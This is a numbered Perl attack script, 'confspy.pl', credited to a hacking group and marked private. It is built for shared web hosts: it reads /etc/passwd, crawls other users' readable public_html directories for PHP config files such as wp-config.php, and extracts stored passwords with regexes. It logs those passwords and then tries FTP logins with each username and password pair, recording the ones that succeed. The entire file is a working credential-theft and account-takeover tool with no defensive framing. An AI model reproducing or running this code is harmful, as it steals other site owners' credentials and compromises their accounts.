1. #!/usr/bin/perl
  3. # [!] confspy.pl v1.1 for /home/$user/public_html
  4. # [!] Private Script !!!
  6. # c0li.m0de.0n Begin !!!
  8. # Please check ftp connection before enable it.
  9. # 0=disable, 1=enable
  10. my $ftp_login = 1;
  11. my $datetime = localtime;
  13. printf "\n
  14. [o]=================================================[x]
  15. | confspy.pl v1.0 by Vrs-hCk |
  16. | ander[at]antisecurity.org |
  17. | www.mainhack.net - www.antisecurity.org |
  18. [o]=================================================[o]
  19. Please wait ...
  20. \n";
  22. write_log('confspy.log',"[o]=================================================[x]\n".
  23. " | confspy.pl v1.0 by Vrs-hCk |\n".
  24. " | ander[at]antisecurity.org |\n".
  25. " | www.mainhack.net - www.antisecurity.org |\n".
  26. "[o]=================================================[o]\n".
  27. " Log Created : $datetime\n\n");
  29. open(ETC_PASSWD, '/etc/passwd') or die("[!] Cannot open or read /etc/passwd !!\n");
  30. @etc_passwd=<ETC_PASSWD>;
  31. close(ETC_PASSWD);
  33. my $total_pubdir = 0;
  34. my $total_readable = 0;
  36. while ($user_list = <@etc_passwd>) {
  37. my $pos = index($user_list,':');
  38. my $username = substr($user_list,0,$pos);
  39. my $public_path = '/home/'.$username.'/public_html';
  40. if (-d $public_path) {
  41. $total_pubdir++;
  42. if (-r $public_path) {
  43. $total_readable++;
  44. push(@users, $username);
  45. }
  46. }
  47. }
  49. print "[+] Total users public_html : $total_pubdir\n";
  50. print "[+] Total readable public_html : $total_readable\n\n";
  51. print "[!] Searching for config files ...\n\n";
  52. write_log('confspy.log',"[+] Total users public_html : $total_pubdir\n".
  53. "[+] Total readable public_html : $total_readable\n\n".
  54. "[!] Searching for config files ...\n\n");
  56. foreach $userid (@users) {
  57. my $userpath = '/home/'.$userid.'/public_html';
  58. &scan_config($userpath,$userid);
  59. }
  61. print "\n[!] Finish.\n\n";
  62. write_log('confspy.log',"\n[+] Finish.\n\n");
  64. sub scan_config {
  65. my $path = $_[0];
  66. my $user = $_[1];
  67. my @dir;
  68. opendir(DIR,$path);
  69. @dir = readdir(DIR);
  70. closedir DIR;
  71. foreach $file (@dir) {
  72. my $fullpath = $path."/".$file;
  73. if (-r $fullpath) {
  74. if (-d $fullpath) {
  75. if (($file ne ".") and ($file ne "..")) {
  76. my $newdir = "$path/$file";
  77. scan_config($newdir,$user);
  78. }
  79. }
  80. else {
  81. if (($file eq "conf.php")
  82. or ($file eq "config.php")
  83. or ($file eq "config.inc.php")
  84. or ($file eq "configuration.php")
  85. or ($file eq "configure.php")
  86. or ($file eq "conn.php")
  87. or ($file eq "connect.php")
  88. or ($file eq "connection.php")
  89. or ($file eq "connect.inc.php")
  90. or ($file eq "database.php")
  91. or ($file eq "dbconf.php")
  92. or ($file eq "dbconnect.php")
  93. or ($file eq "dbconnect.inc.php")
  94. or ($file eq "db_connection.inc.php")
  95. or ($file eq "db.inc.php")
  96. or ($file eq "db.php")
  97. or ($file eq "dbase.php")
  98. or ($file eq "setting.php")
  99. or ($file eq "settings.php")
  100. or ($file eq "setup.php")
  101. or ($file eq "index.php")
  102. or ($file eq "e107_config.php")
  103. or ($file eq "wp-config.php"))
  104. {
  105. my $passwd = get_pass($fullpath);
  106. if ($passwd != 1) {
  107. if ($ftp_login) { &ftp_connect($user,$passwd); }
  108. }
  109. }
  110. }
  111. }
  112. }
  113. }
  115. sub get_pass {
  116. my $filepath = $_[0];
  117. open(CONFIG, $filepath);
  118. while (<CONFIG>) {
  119. my($line) = $_;
  120. chomp($line);
  121. if (($line =~ m/pass(.*?)=(.*?)'(.+?)';/i)
  122. or ($line =~ m/pass(.*?)=(.*?)"(.+?)";/i)
  124. or ($line =~ m/pass(.*?),(.*?)'(.+?)'\);/i)
  125. or ($line =~ m/pass(.*?),(.*?)"(.+?)"\);/i)
  127. or ($line =~ m/pwd(.*?)=(.*?)'(.+?)';/i)
  128. or ($line =~ m/pwd(.*?)=(.*?)"(.+?)";/i))
  129. {
  130. my $pass = $3;
  131. if (($pass !~ / / ) and ($pass !~ /"/ ) and ($pass !~ /'/ )
  132. and ($pass !~ /_/ ) and ($pass !~ /\.\+\?/ )) {
  133. &write_log('confspy.log',"[+] $filepath\n[\@] $pass\n");
  134. return $pass;
  135. }
  136. }
  137. }
  138. close(CONFIG);
  139. }
  141. sub ftp_connect {
  142. my $usr = $_[0];
  143. my $pwd = $_[1];
  144. my $success = 1;
  145. use Net::FTP;
  146. my $ftp = Net::FTP->new("", Debug => 0, Timeout => 2);
  147. $success = 0 if $ftp->login($usr,$pwd);
  148. $ftp->quit;
  149. if ($success == 0) {
  150. print "[FTP] $usr:$pwd -> success !!!\n";
  151. &write_log('confspy.log',"[FTP] $usr:$pwd -> success !!!\n");
  152. }
  153. }
  155. sub write_log {
  156. my $log = $_[0];
  157. my $data = $_[1];
  158. open(LOG,">>$log") or die("[!] Cannot create or open log file.\n");
  159. print LOG "$data";
  160. close(LOG);
  161. }
  163. # c0li.m0de.0n End !!!